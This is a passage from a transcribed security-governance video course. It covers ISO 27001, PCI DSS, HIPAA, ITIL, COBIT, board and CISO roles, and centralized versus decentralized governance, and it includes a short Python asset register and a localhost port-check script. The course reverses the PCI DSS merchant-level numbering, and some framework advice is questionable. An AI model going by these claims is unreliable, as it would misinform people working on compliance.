spending more money. Because since, there are less number of threats, there are
less effort that you've to put in. You define a method to systematically detect
vulnerabilities. As part of the ISO 27001, you will do vulnerability assessment.
You will ensure that those vulnerabilities are closed, and they're properly mitigated
to prevent any kind of threat from happening. It also provides a method to meet the
compliance requirements. You implement risk management, which will help you
ensure legal and regulatory compliance. Because you have already implemented
risk management, the number of risks have been identified, number of critical
assets have been identified. Therefore, there is more closeness to the legal and
regulatory compliances. It follows the PDCA method, which is plan, do, check, act.
Now in ISO 27001, 2013 version, PDCA is not explicitly mentioned. It was there in
version 2005, but it is still used as the underlying method.
Now, let's understand what PCI DSS means. It's an acronym for Payment Card
Industry Data Security Standard. It is a set of security requirements developed and adopted by the payment card industry. This is done to protect credit card information. Any online merchant or service provider who processes, stores, or transmits credit card information needs to comply with the PCI DSS guidelines. If they do not do that, they are liable to face penalties. Now, there could be different types of merchants. It could be a merchant doing 1 million transactions in a month, or it could be a merchant doing 10,000 transactions in a month.
[Video description begins] The PDCA stands for Plan, Do, Check, Act. [Video
description ends]
So there are different levels of PCI DSS that you need to comply with. So going
forward, we will look at the types of merchant levels that need to comply
themselves with the PCI DSS standard.
[Video description begins] PCI. [Video description ends]
PCI DSS defines four different merchant levels. Depending on the number of transactions you perform, you need to be compliant with PCI DSS at a specific level. These four different levels that we are talking about were defined by Visa, which is pretty clear about the four different types. It starts with any merchant who does fewer than 20,000 transactions in a year. Then the second level is any merchant who does between 20,000 and 1 million transactions in a year. The third level is any merchant who does between 1 and 6 million transactions in a year.
[Video description begins] Types of Merchant Levels. [Video description ends]
And the fourth level, which is the topmost level, is any merchant who does more than 6 million transactions in a year. Based on the number of transactions that you do in a year, you need to be compliant at a specific level in PCI DSS. Next, we will
now look at HIPAA compliance framework. HIPAA stands for Health Insurance
Portability and Accountability Act of 1996. The HIPAA compliance framework is
mainly applicable in the United States of America. The HIPAA framework defines the
security requirements for any kind of electronic transmission of patient data. It
helps to outline the policies that help to ensure data privacy and implement security
processes for protecting medical information. When you talk about HIPAA
compliance framework, it provides detailed requirements for privacy and security
of data. It tells you that patient information is very sensitive and needs to be protected. The HIPAA compliance framework gives you guidelines on how to protect the privacy and the security of patient data. There are different types of patient information involved, which could be in the form of written documents, verbal communication, voicemail, databases, audio, video, and images. All these types of information need to be protected, and this can be done with three different types of security controls: one is administrative, the second is physical, and the third is technical. HIPAA requires you to make use of these three different types of security controls to protect the information.
There are three different entities who are involved in HIPAA. So, one is the
consumer; the consumer is the patient. The patient information is stored with the providers, in electronic or non-electronic form. HIPAA requires the providers to safeguard this information at any cost. Then you have the regulators, the main federal agency responsible for informing the public about their health information privacy rights and protecting those rights. Then
we come to the ITIL compliance framework, which is an acronym for Information
Technology Infrastructure Library. Now when you talk about ITIL, it is the IT
infrastructure library that defines the best practices for IT services management.
Now, there is no specific reason why an organization cannot implement ITIL. Any organization that wants to improve IT services can adopt this compliance framework and implement it within the organization. ITIL defines a framework for the incident management process. Now, why would you want to define a framework for incident management?
[Video description begins] HIPPA. [Video description ends]
Because, according to ITIL, incidents should be handled through a structured process. They need to be handled through a structured process to ensure efficiency and the best results. If you do not have an incident management process implemented, the users and the IT team within the organization do not know what to do with an incident. When you have implemented the incident management process through the ITIL compliance framework, you should be able to handle incidents through a structured process with more efficiency and better results. ITIL also helps the organization use IT service management (ITSM) practices, and this helps them align their IT services with the business functions because there are set processes that you have to follow. If you do not follow those processes, you have not actually implemented ITIL; you need to be able to follow these practices.
[Video description begins] The abbreviation of IT Service management is
ITSM. [Video description ends]
Going forward, we will look at some of the processes and the procedures that ITIL
brings into the picture. Now, this is the ITIL framework. In it, there are different processes and functions.
[Video description begins] ITIL Frameworks. An ITIL framework is displayed. It
contains five steps that are Service Strategy, Service Design, Service Transition,
Service Operations, and Continual Service Improvement. The Service Strategy step
contains four process that are called Financial Management, Service portfolio
Management, Demand Management, and Strategy operations. The Service Design
step contains Service level Management, Availability Management, Capacity
Management, Continuity Management, Information Security Management, Service
Catalogue Management, and Supplier Management. The Service transition step
contains Change Management, Asset and Configuration Management, Release and
Deployment Management, Transition Planning and Management, Service
Validation Management, Evaluation, and Knowledge Management. The Service
Operations step contains Service Desk, Incident Management, Problem
Management, Access Management, Event Management, Request Management,
Technical Management, Application Management, and IT operation Management.
The Continual Service Improvement contains 7 Step Progress Improvement. [Video
description ends]
Anything that is in the dark shade is considered a function. So for instance service
desk. Service desk is a function. What is the role of service desk? For example, a
user's desktop is not working. What does the user do? They call up the service desk, which is actually a help desk that helps log a ticket for that particular desktop. An engineer comes, repairs the desktop for the user, and the complaint is resolved. Now this particular incident, or the ticket logged in the
service desk is considered to be resolved. Then there are other functions, such as technical management, which looks after the servers and various other things; application management, which is more to do with deploying applications and managing them; and IT operations management, which covers the complete IT operations that run, from managing the service desk to implementing new applications and new servers. Then the other part is the processes. There are different processes that run within the organization. It could be financial management, demand management, or strategy operations, which are run by the top management. How all of these function together is what the ITIL framework defines. So, take the example of supplier management.
What happens when somebody supplies a set of material to your organization?
How does that function? How does the security come into the picture? Let's assume
a supplier supplies a set of desktops to your organization. So how does the supplier
management and security function together to ensure that deliveries are appropriate
and the assets that have been received from the supplier can be safeguarded?
Similarly, if you look at the Change Management process under service transition: if you do not have the ITIL framework implemented and you need to deploy or make configuration changes to a critical server in the organization, you would just simply go ahead and do it. You do not know what the outcome of that change will be. However, when you have the Change Management process, there is a Change Advisory Board, known as the CAB, put in place. They review every change that you are planning to do, and they approve or reject the change. You have to make sure that you test what you want to implement and show them the results so they can approve or reject your change. So, there is a particular process
that gets implemented. Every change made to the IT infrastructure in the
organization is recorded. Similarly, there are other processes, such as asset and configuration management: how the assets are tracked, their service history, and what role they play in configuration management. The ITIL framework in totality defines all of this.
The next one is COBIT, which stands for Control Objectives for Information and
Related Technologies. COBIT is a framework which works on five different principles: meeting stakeholder needs, covering the enterprise end to end, applying a single integrated framework, enabling a holistic approach, and separating governance from management. Since it separates governance and management, it is used both for IT governance and IT management. So, using a single framework, you can do IT management and also implement IT governance. It is also used by organizations in different types of industries. There is no fixed industry in which COBIT has to be used; it is not only the IT industry. COBIT can be used across different industries, be it automotive, manufacturing, or the medical industry. It also focuses on the following aspects of the information system: quality, control, and reliability. With the help of COBIT, an organization ensures the quality, control, and reliability of its information systems, because COBIT covers both IT management and IT governance. Therefore, all three critical components, which are quality, control, and reliability, are strictly monitored and governed under COBIT. Let's now look at
the four domains of COBIT and we will also do a comparison with ITIL.
COBIT has four domains. The first one is plan and organize, which uses the
information and technology to drive best results for the business goals and
objectives. It also focuses on the organizational and infrastructural form of IT to
drive best results. The second domain is deliver and support, which focuses on the
delivery of information and technology. It focuses on the effective delivery of IT
within the organization. We then move to the third domain, which is acquire and
implement. This domain identifies IT requirements and also focuses on acquiring,
and implementing technology for the business. This domain also develops a
maintenance plan to keep the IT infrastructure going. Finally, the fourth domain, which is monitor and evaluate, focuses on the strategy that assesses whether the current IT infrastructure meets the business requirements or not. It also covers the monitoring aspect of IT performance. Let's now look at how COBIT differs from ITIL. Even though it is quite similar to ITIL, it is much broader in scope. The reason is that ITIL focuses on IT processes, whereas COBIT focuses on controls and metrics. This is the reason COBIT answers "why" and ITIL answers "how." COBIT is mainly audit-driven, whereas ITIL is mainly service level-driven. ITIL focuses on mapping IT service levels. On the other hand, COBIT focuses on mapping IT processes.
Senior Management Roles and Responsibilities
[Video description begins] Topic title: Senior Management Roles and
Responsibilities. The presenter is Ashish Chugh. [Video description ends]
Let's now look at management problems in the context of security governance. First of all, the management does not pay attention to security, which means the board of directors, or generally the board, does not get involved in strategic IS decisioning, which is information security decisioning, and does not delegate this responsibility to anybody who's qualified to handle it. Also, the board does not get any kind of updates on the state of information security, its adequacy, its effectiveness, or the control measures in place. Therefore, it cannot evaluate the added value of security for the business.
Then, we move on to implementation of security in silos, which means the security
of an organization and its infrastructure is the responsibility of a single department.
And this responsibility is not shared with any other department in the organization.
Then, there are minimal security controls in place. Because there is no
measurement on the effectiveness of the existing security controls, sometimes the
security team places only the required controls, which they think are sufficient.
Therefore, it is a problem with the implementation of only a few controls. This also
leads to another point that the defense in depth might be missing in most
organizations.
The management also does not pay attention to security; for them, business comes first, and security is the responsibility of the security department. Most
often, businesses consider the chief information security officer or chief
information officer to be responsible for the security. Which is not the correct thing
to do, because it is not only a single team that can drive the security initiative.
Funds for security are not available, that is because in most cases security is
considered to be an overhead. Very often you would see the security team trying to
convince the senior management to buy more security hardware or the software.
But most often, they are unsuccessful, because the management does not see the
necessity of spending that money on the security hardware. This leads back to the
first point, because there is a very little attention to the security. Management is
also unaware of risks and measures. This is because the business initiatives and
projects are not assessed for thier compliance with the security strategies. This
means that they are not assessed for new security risks.
[Video description begins] Management Problem. [Video description ends]
This largely happens because the security team is working in a silo, and they are not connected with the other departments. Therefore, new upcoming projects are not assessed for security risks. And since they are not assessed, the management does not know about the new risks and what measures need to be put in place to counter them. A business may end up changing several processes over a period of time. As and when new business processes are introduced, new security risks are born, and they are likely to be present in the organization. However, because none of these business processes are assessed, the risks are unknown. Because the risks are unknown, the existing security posture does not solve the business problem. This is because, one, the management does not provide sufficient funds, and two, the management does not pay attention to the security of the infrastructure; for them, it is not a business problem. Then we come to the return on investment. Since the management is not involved in the security infrastructure, its decisioning, or its security strategy, the security team is unable to justify the return on investment to the management.
Previously, we had discussed management decides how security has to be
implemented. On the other hand, governance decides who's responsible. And if
there is no governance in place, the accountability for data privacy protection is not
defined. It is left only to the security team to protect data privacy, which is what happens in most organizations. And that is not the correct way to do it, because protecting data privacy is not the security team's problem alone. Let's now look at how security governance becomes a management responsibility. First of all, security governance is not owned by the users; it is everybody's responsibility. We start from the top and go down to the bottom of the organization, which is the last employee in the organization. Everybody must be involved in the security processes. And there would be some stakeholders, typically the end users, who need to adhere to the security processes.
[Video description begins] Security Governance As Management
Responsibility. [Video description ends]
Security governance also requires management commitment. If management is not
involved, it is not security governance. Because those are the people sitting on the
top who would decide the security strategies. They are the ones who have to
designate an individual or a team of individuals who will manage the security.
Therefore, it needs a management commitment to be successful. Security is most
often looked at as a technical problem, which is not the correct way of looking at it.
It is a management problem. When the management is involved, when the
decisioning happens right at the top of the organization, then it becomes a
management problem. And why does it become a management problem? Because security directly affects the business processes. If there is no adequate security, then there are chances that more and more risks are going to be introduced within the organization. And since these risks are present, there are chances of the organization's data being at risk. Since the management is involved, the attention of the leaders needs to be present for security governance. This is because these people will sit down and decide the security strategy. They will also help take decisions, and they will decide how security needs to be aligned with the business processes. Remember, security cannot run in a silo like it does in most organizations. Unless and until it is properly aligned with the business processes, it cannot protect the business.
Let's now look at some of the senior management roles. So you have board of
directors, you have executives, steering committee, and you have chief information
security officer. Remember, every organization will have different set of senior
management roles. Therefore, it is not necessary that everybody will have the board
of directors, executive, steering committee, and chief information security officer.
Just to give you an example, a medium-sized organization, instead of having a chief information security officer, might have the chief information officer take up the role of chief information security officer. The board of directors is the topmost position, where a set of individuals decides the security strategies. These are passed on to the executives and the steering committee, and the chief information security officer helps implement the security strategy across the business.
[Video description begins] The abbreviation of Chief Information Security Officer
is CISO. [Video description ends]
Let's now look at some of the senior management responsibilities. First of all, at the
top, which is the board of directors and the chief information security officers,
steering committee, and the executives. These people come up with a security strategy, which helps in developing and providing strategic direction. The security strategy has a set of defined objectives, and they also ensure that these objectives are met. How they are met depends on the implementation of the security strategy. The security strategy also helps to identify the risks and define them: what these risks are, what the criticality of these risks is, and how they can be mitigated. Finally, the senior management also has to ensure there is proper resource utilization. This could be in terms of the manpower or the infrastructure that is available. So they ensure that proper resource
utilization is taking place. Let's now look at four essential practices for the board.
First of all, they ensure that security is one of the key agenda items in their portfolio. If it is not there, then of course governance is not present in the organization. So security becomes one of the key agendas that the board has to look after. And this is, again, not looked at as a technical problem but as a management problem. The board takes the strategic decisions and ensures that security is implemented and driven in a proper fashion. They also ensure that a leader is identified who is accountable for security. In most cases, this would be the chief information security officer. Then, a security policy is not only defined, but it is reviewed for effectiveness from time to time. Your business processes may change, you will get new projects, and old projects will end; therefore, there are chances that you will have to revise your security policy, because the existing security policy may not cater to the new projects or the new business processes that are in place. It is therefore essential that the security policy is reviewed for effectiveness and changed from time to time, if required. The committee is also responsible for ensuring that
information security is aligned with the business processes and is implemented in a
proper manner. Let's now look at the paradigm shift, how security was looked at in
the past and how it is being looked at now. If you talk about the overall objective in
the past, the only objective was IT security. And it was driven only by the security
team. In the current scenario, most organizations are now moving the overall
objective to business continuity. Which means, if a disaster happens, which could be in any form, a flood, an earthquake, a malware attack, or a hacking attempt on the organization, and servers are down, then there is some problem with the IT infrastructure and business continuity has to come into the picture. This means the organization should be able to revive its infrastructure in the next few hours and get the business up and running. Initially, the defined scope was technical and now the defined scope is
business. Which means the management is involved and security is being looked at
as a business problem, not the technical problem. In the past, IT team or the
security team was the owner of the security, now it is the business that is the owner
of the security. They do the strategic decisioning, they come up with a plan, they
know what to implement. Of course, IT or the security team plays a key role in the
implementation. But the management is the one that knows the return on
investment on the security. In the past, funds were always a problem as far as IT
costs were concerned, everything in the IT infrastructure was looked at as expense.
Now, because management is playing a key role, it is being looked at as an
investment. Consider an example. If somebody steals your confidential information and sells it to a competitor, your business stands nowhere in that context. In that light, you cannot consider IT infrastructure a cost. If you had put enough measures or enough security controls in place at the initial stage, you would have prevented this from happening. So this is an investment: you are investing in IT infrastructure and putting security controls in place to safeguard your data. Initially, management used to get involved once in a while; it was ad hoc involvement. Now there is continuous, ongoing, and integrated involvement from the management. The simple reason is that security is no longer an IT problem, it is a business problem. As far as the approach method is concerned, in the past it was a practice-based method, which means that you had to do something and get security in place; there were no processes attached to it. Now,
organizations have started to shift from practice-based to process-based, which
means everything is aligned to a specific process. It was earlier managed by IT
teams, now security is being managed by the business leaders.
Ensuring Good IT Security Governance
[Video description begins] Topic title: Ensuring Good IT Security Governance. The
presenter is Ashish Chugh. [Video description ends]
How do you ensure good IT security governance? So there are basically three steps
that you have to follow. First, you have to create governance within the
organization. Second, you have to deliver governance through the right
stakeholders. Third, you have to review the governance on a periodic basis just to
ensure that everything is working as it is expected to. Let's now look at creating the
governance. So first of all, you need to have an information security policy defined,
and it must be aligned to the business requirements. Going back to the discussions
that we had earlier, security policy cannot work in a silo. It must be aligned to the
business requirement, and it must always be updated to cater to the business
requirements and the processes. The governance must be top-down, from the board level, which is the C-level, to the last employee of the organization. Remember, it cannot be the last employee who's driving the governance; it has to drill down from the top level to the last employee. This is because if the management is involved, the employees are likely to adopt the approach much faster than if the security team tries to enforce it. A risk management approach must be developed and implemented, and it should oversee the corporate security policy that is aligned to the business requirements and processes. This is to ensure that the existing risks, and the new risks being introduced into the environment, are being mitigated. A corporate IT security authority must also be appointed, preferably with a different reporting chain than those responsible for IT operations. This person should watch over the security operations, because somebody needs to lead from the front and ensure that security operations are well-aligned with the business operations and cater to the business processes. There should also be clear roles and responsibilities defined for the individuals in the security team, and the IT security authority in particular needs to have a clear role and responsibilities defined. You should also
establish an internal audit and review authority with the direct line of
communication to the board. IT security policy must be reviewed along with the IT
security posture on the regular basis. And if there are changes required as per the
business processes or the business operations, both of them, which are IT security
posture, as well as IT security policy, need to change. Let's now look at how to
deliver governance. First of all, you need to identify the assets. Assets not only
need to be identified, they need to be categorized, they need to be categorized
according to their criticality. So for instance, one server may not be as critical as
the domain controller. So therefore, you need to identify the asset, assign a
criticality level, and also associate the risk levels attached to the asset. You should
also identify the risks and threats for each critical asset. Once you have defined the
assets, you have defined their criticality level, now you need to move ahead and
identify the risks and threats that may be applicable to that particular asset.
Remember, it is not necessary, a same risk might be applicable for all the critical
assets, there could be a possibility, but it is not necessary. Similarly, different types
of threats would be applicable to different types of critical assets. Once you have
done that, then you need to implement the security controls and their procedures.
This is required because unless or until you have identified the risk and threats, you
should not implement security controls. This is what had been happening in the
past where security controls were generalized and they were implemented. Now,
they need to be implemented as per the risks and the security threats. Everybody
who's participating in the security operations, they must have roles and
responsibilities defined. So for instance, chief information security officer will have
different set of roles and responsibility than the IT security administrator. So
everybody needs to have a clear cut role defined, everybody needs to have clear cut
responsibility defined. If that is not done, then accountability cannot happen later
on, if there is an incident that takes place. Moving on, you should also conduct
audits and reviews regularly, this is going to be required.
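One way to make the asset identification and criticality steps described above concrete is a simple asset register. The following is a minimal sketch in Python; the asset names, criticality levels, and risks are purely illustrative assumptions and not part of the course material.

```python
# Minimal sketch of an asset register with criticality and associated risks.
# All names and values below are illustrative assumptions, not a real inventory.
from dataclasses import dataclass, field

@dataclass
class Asset:
    name: str
    criticality: str                               # e.g. "high", "medium", "low"
    risks: list = field(default_factory=list)      # risks/threats identified for this asset

# Example register: a domain controller is typically more critical than a print server.
register = [
    Asset("domain-controller-01", "high", ["credential theft", "unpatched OS"]),
    Asset("file-server-02", "medium", ["ransomware", "excessive share permissions"]),
    Asset("print-server-03", "low", ["unnecessary open ports"]),
]

# Review the most critical assets first so controls are applied where risk is highest.
order = {"high": 0, "medium": 1, "low": 2}
for asset in sorted(register, key=lambda a: order[a.criticality]):
    print(f"{asset.name} (criticality: {asset.criticality}) -> risks: {', '.join(asset.risks)}")
```

The point of the sketch is only that assets, criticality levels, and their associated risks are tracked together, so controls and audits can be prioritized against that record.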
[Video description begins] Review Governance. [Video description ends]
Because if audits and reviews do not happen, you do not know whether the security
controls are still effective or not. Audits can happen at a designated interval, and so can
the reviews. Both are necessary for you to understand whether the security
controls are adequate for the existing security posture. They may or may not
be, but the outcome of the audits and reviews will decide that. Once you have
done the audits and reviews, you may have to adjust the security controls and the
security posture accordingly, based on the outcome. If that is not done, then
you are still living with the risks. The audits and reviews will also find the risks
and threats that are applicable to certain types of assets. Once you have
identified those, you need to ensure that these risks are properly mitigated, and you
need to mitigate them in alignment with the business strategy and business
operations. Going back to the previous discussion, remember that security must be
aligned with the business processes, and therefore any risk that you're mitigating
must be dealt with keeping business goals in mind. It should not happen that you
mitigate one risk but introduce a few more new risks into the
organization that can impact the business processes.
Let's now look at the signs of good security governance. First of all, everyone in the
organization must be involved. This is because security governance has to start
from the top, which is the board, and go down to the last user. Everyone knows
the importance of security and complies with it. The board must be involved in
security-related decision-making, which means they are not isolated. They are
not only paying attention to the business; they also understand the importance
of security and are involved in security-related decisions. The organization must
also define a security strategy and security policies, because both of these form
the base of security governance. If they are not defined, then security governance
cannot be implemented in a proper fashion. If they are defined and implemented,
most of the work of security governance is already done.
Moving on, the level of security protection is based on the risk appetite, which
means you do not keep implementing security controls endlessly; you implement them to
mitigate the risks that you foresee. Therefore, the security controls must be
implemented depending on, and in line with, the risk appetite of the organization.
The organization must manage information security actively, which means the security
team actively performs its job in monitoring the infrastructure, and the security
controls are reviewed on a periodic basis and changed as and when needed.
Risks and Opportunities
[Video description begins] Topic title: Risks and Opportunities. The presenter is
Ashish Chugh. Absence of Security Governance. [Video description ends]
Let's now look at what happens if there is an absence of security governance. The
organization does not have security policies or procedures. Even if it does, the
security policies and procedures are outdated and cannot be followed with the current
security posture. Then there is an absence of an authority figure for decision making
related to security, infrastructure assets, and the infrastructure itself. Since this
person is missing, the right decisions are sometimes not made. Then, from the top level,
which is the board, down to the last user, which is an employee, there is hardly any
awareness of security practices. The security policies and procedures are virtually
unknown. This means there is either no user training, or the training that does take
place does not involve everyone in the organization. So for instance, the board itself
is not trained properly on security. Moving ahead, the servers, the systems, and the
other critical infrastructure do not have adequate hardening, and there are no patch
management methods implemented.
Now, when you talk about hardening, there is a certain baseline you create when
you roll out an operating system on a system. Once the baselining is done, you
harden the system. That means you stop the unnecessary services, you implement proper
security controls like antivirus and a firewall, and you close the open ports that are
not required. This is what is involved in hardening a system. If that is not done,
virtually every system is prone to attack. Then there are no audits for security
compliance, and therefore no remediation of the current processes or the
infrastructure. Everything runs in as-is mode. Since there are no compliance audits
happening, you do not know whether the current infrastructure has a good or bad
security posture, whether the risks are being mitigated or not, or whether the existing
security controls are adequate or not. Let's now look at the reasons for ineffective
security governance. First of all, there is no authority delegation, which means there
is no defined authority who can make decisions for security implementation or who can
drive the security team to look at the security posture of the organization. Then there
is no budget control authority, which means budgets are not properly defined.
There is nobody who can monitor the budgets assigned to the security team. Or, because
there is no authority to look after the budgets, there are sometimes inadequate or
insufficient budgets for the security team to put enough security controls in place.
They might want to buy new hardware or software, but they are unable to do that. There
are infrequent or no meetings. The security team, again, works in silos. They do not
interact with the other teams, which could be a project team, the operations team, or
even management. Since there are no discussions or meetings taking place regarding
security governance or security practices, this becomes a problem, and it clearly
indicates ineffective security governance. Then there is untimely decision-making,
which is often due to poor quality data that does not allow a person to make a
decision. The person has to spend time doing research, thinking it over, or discussing
it with other members of the organization, and by then the decision itself has become
untimely. Then there is a lack of management buy-in. Because management is not
involved, they're not looking at security as a business problem. Therefore, it becomes
very difficult for the security team or its leader to convince management to, let's
say, buy new hardware or implement something new within the infrastructure to tighten
up security.
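Hardening was described earlier as stopping unnecessary services and closing ports that are not required. As a small illustration of how part of that might be spot-checked, here is a minimal sketch that probes a host for listening TCP ports; the host address and port list are assumptions for the example, and such a scan should only be run against systems you are authorized to test.

```python
# Minimal sketch: check which TCP ports are listening on a host as part of a
# hardening spot-check. Host and port list below are illustrative assumptions.
import socket

HOST = "127.0.0.1"                                     # assumed target; test only authorized systems
PORTS = [21, 22, 23, 80, 135, 139, 443, 445, 3389]     # common ports worth reviewing

def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

open_ports = [p for p in PORTS if is_open(HOST, p)]
print(f"Listening ports on {HOST}: {open_ports or 'none of the checked ports'}")
# Any port in this list that is not required by the system's role is a hardening candidate.
```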
[Video description begins] Opportunities by Security Governance. [Video
description ends]
Let's now look at the opportunities created by security governance. First of all,
you're able to identify high-risk vulnerabilities. This can happen because timely
security practices are put into place to find unknown hardware or software flaws and
security vulnerabilities. This is possible because you would run vulnerability
assessments and penetration testing from time to time, and figure out everything from
the smallest to the biggest vulnerability existing within the infrastructure. Effective
security governance also uses a proactive security approach. It helps you not only find
vulnerabilities but also find the risks and the possible threats that may occur within
the infrastructure. With this proactive security approach, you are able to deal with
real security risks, which means that you are able not only to detect them but also to
put in security controls and various other measures to mitigate them. With the help of
a proactive security approach, security governance also helps you detect known and
unknown flaws, which are nothing but the vulnerabilities that may exist, along with the
risks, within the system. It also provides advice on handling these vulnerabilities,
which means it gives you guidance to assess and validate the efficiency of defensive
mechanisms, going beyond the depth of analysis provided by vulnerability assessments,
and to identify whether any weaknesses originate from errors that may be human or
technical.
Let's now look at some of the best practices of security governance. Information
security activities should be governed based on relevant requirements, which may
include laws, regulations, and organizational policies. Information security
responsibilities must be assigned to and carried out by appropriately trained
individuals. This means individuals responsible for information security within the
organization must be held accountable for their actions or lack of action.
Information security priorities should be communicated to stakeholders at all levels
within the organization to ensure successful implementation of the security program.
This means that you must involve the senior management of the organization.
Information security activities must be integrated into other management activities to
ensure that they are able to accomplish the business goals and the vision of the
organization. Information security should be continuously monitored for performance.
The designated individuals within the security team should continuously monitor the
performance of the security program for which they are responsible, and they should
use tools to ensure that appropriate information about the performance of the security
program is generated. Information discovered through this monitoring should be used as
input into management decisions about priorities and funding allocation, to effect
improvement of the security posture and the overall performance of the organization.
Also, as one of the best practices of security governance, you have to ensure that each
stakeholder, whether part of the board or the steering committee, is aware of the
information security priorities and is able to provide valid input to implement
security governance.
Security Governance Program
[Video description begins] Topic title: Security Governance Program. The
presenter is Ashish Chugh. [Video description ends]
Let's now look at what the security governance program goals are. First of all,
you need to identify the need for a compliance framework. You have to determine
whether there is a requirement for a governance framework, and if there is, which
type of governance framework you are looking for. For example, if you are in the
medical industry and keeping patient records, PCI DSS is not the appropriate
security governance framework to apply; you would rather go
for HIPAA, which is applicable to the medical industry. Then you also need to
ensure that the security governance framework aligns with the management's
security goals.
You have to keep track of those goals and benchmark against the
security governance framework that you're applying. You also need to know the
type of data you handle. As in the example I just stated, if you are in the medical
industry you will not opt for PCI DSS or ISO 27001; you will want to go with
HIPAA, which applies to the medical industry. You should also check whether there are
any existing compliance standards applied within the organization. You may not
have opted for any compliance framework, but there may already be plenty of
security policies that have been implemented. If those are in place, you should not
simply throw them away, but tweak or modify
them according to the new security governance framework that you are opting for.
To implement a security governance framework, you need to do the following.
[Video description begins] Process for Implementing Governance
Framework. [Video description ends]
First of all, you need to identify the governance requirements. Without this, you
will not be able to opt for an appropriate governance framework. Then you need to
know what type of governance framework you are looking for to meet your
requirements; the adoption of a governance framework will depend on the
nature of the organization's business. Finally, after identifying the
governance framework, you need to implement it. Each type of governance
framework is different in nature, and its implementation will vary. Therefore, you
need to carefully plan the implementation after thoroughly understanding how it
works.
Governance Framework Structure
[Video description begins] Topic title: Governance Framework Structure. The
presenter is Ashish Chugh. [Video description ends]
Let's now look at the need for a security governance framework. First of all, if you
do not have any kind of security compliance within your organization, you may
need to use a particular governance framework as a pre-defined structure. Each
governance framework gives a pre-defined structure that you can use to
implement compliance and governance within your organization. It might also be a
legal or contractual requirement. Often, when an organization is outsourcing
a project to another organization that is smaller in size, it wants the smaller
organization to be compliant with one of the compliance frameworks; however, that
solely depends on the nature of the project being outsourced. A security
governance framework also helps to engage the entire organization. Earlier we
discussed that the board has certain responsibilities, such as defining the security
strategy, and users have certain responsibilities, such as adhering to the security
policies that have been defined. Therefore, the entire organization becomes engaged
when a security governance framework is implemented. It also helps you define clear
roles and responsibilities.
Now, if you take the example of ISO 27001, it involves management, who
have to state that they are going ahead with the ISO 27001 program. So there
is an approval from management; therefore, it also involves management
within the program, which is the security governance framework, and it gets them
to pay a little more attention. When there is no security governance, the
management is least bothered about security within the organization. However,
when a security governance framework is implemented and security governance
comes into existence, management is involved, because, as we discussed earlier,
there is a steering committee and there is a board of directors, known as the
board. All are involved at different times in creating security strategies, creating
security policies, and implementing them. So their involvement becomes a must when a
security governance framework is applied within an organization. Let's now look at
the governance framework structure,
[Video description begins] A governance framework structure is displayed on the
screen. It contains four domains that are called Develop, Implement, Deploy, and
Enterprise. The Develop domain contains three teams that are called Architecture
Board, Enterprise Architects, and Domain Architects. The Implement domain
contains two teams that are called Programme Management Office (PMO) and
Implementation Projects. The Deploy domain contains two teams that are called
Service Management and Systems. The Enterprise domain contains seven teams
that are called Operational Standards, Roles & Responsibilities, Regulatory
Compliance Requirements, SLAs/OLAs, Architecture, Process, and
Solutions. [Video description ends]
which clearly displays the roles and responsibilities and how each one of them is
tightly integrated with the others. The structure of the security governance body
can vary depending on the organizational structure and how it operates. In this
particular scenario, if you look at it, there are three working domains that have been
defined: develop, implement, and deploy. There are certain teams: the first
is the board, which provides the guidance. Then come the CTO and CIO, who
implement, and then there is a security team, which deploys and manages the
services. Then, across the entire enterprise, there are operational
standards, roles and responsibilities, regulatory compliance requirements, and so on.
All of these are tightly integrated with each of the domains, which are develop,
implement, and deploy. Let's now look at the governance framework structure
elements. There is a risk management methodology, which helps you identify and
mitigate risks. Then there is a security strategy, which is tightly integrated with the
business objectives and the mission of the organization, and which brings out the value
of the information that needs to be protected. Then there is a security organizational
structure, which defines who is at the top and who is going to do what.
So basically, roles and responsibilities are also defined based on the security
organizational structure. Then come the security policies, which help you address
the strategy, put the security controls in place, and meet the
regulatory requirements. You also define several security standards for each
policy that has been implemented. After all this has been done, you continue
to monitor your security processes and put a continued evaluation process in place.
If this process is missing, then of course your security becomes pretty static;
once you implement it, you will not go back and change it. Therefore, you have to
monitor and continuously evaluate the security processes and
make improvements accordingly.
Let's now look at security governance activities. We have three different dimensions:
role, responsibility, and task. Roles are defined for senior
management, the steering committee, and the chief information security officer, who is
part of the steering committee. The responsibility of senior management is defining
the business strategy, and its task is to meet the organizational
objectives, which means the business strategy needs to meet the organizational
objectives laid out in the mission and goal statements. Then you have the steering
committee. Its responsibility is to define risk management and the information
security strategy; what it does is bring out the security requirements for the
organization. Then comes the chief information security officer,
who not only drives the security action plan, policies, and standards,
but also plays a key role in the security program, the implementation of the security
program, and the security controls. They also ensure that the security objectives are
aligned to the organizational objectives. And going forward, they continuously
monitor the existing security posture and create metrics reporting, which over a
period of time gives you the trends of the security posture within the organization.
[Video description begins] Security Governance Structure. [Video description
ends]
Security governance can have different types of structures. These structures can be
centralized, decentralized, or hybrid. Going forward, we will look at each one of
them. When you talk about the centralized governance structure, everything
related to security governance is controlled by a centralized team, which
consists of top executives of the organization.
[Video description begins] Centralized Vs Decentralized Governance
Structure. [Video description ends]
For example, the chief information security officer would be part of the centralized
governance structure. This team maintains the budgets. It also looks after the
implementation of security components, which are nothing but the security controls,
and tightens the security posture. And it also performs continuous monitoring. The
decentralized governance structure oversees responsibilities at the department
level. The responsibilities are distributed at the department level, and
similarly the budget is also handled at the department level. So there is nothing
centralized; everything works at the department level. Let's now look at the hybrid
governance structure. It is a combination of the centralized and decentralized
structures. Some responsibilities and tasks are distributed at the department level,
but most of the control is maintained at the central level, which is the organization
level. For example, if you look at the budget, it would probably be maintained at the
centralized level, not at the department level. However, the implementation part
could be distributed at the department level.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of security governance
and to learn how it plays a key role in security strategy. We did this by covering the
role of security governance. We also covered different types of governance. We
also looked at the role of senior management in the security governance
programme.
We also learned about rolling out a security governance program. We also covered
the tools and controls to enforce security governance. In our next course, we will
move on to explore honeypots and how they fit into a security strategy.
Information Security: Honeypots
Explore various honeypot concepts, such as the types of honeypots, roles and uses
of a honeypot, and how honeypot data analysis is used. In this 12-video course, you
will examine strengths and weaknesses of a honeypot and how it is placed in
networks. Key concepts covered in this course include the honeypot system itself,
configured to detect, deflect, or counteract any unauthorized attempt to gain access
to information; learning the various types of honeypots that can be used focusing
on low and high interaction level types; and learning about the role played by
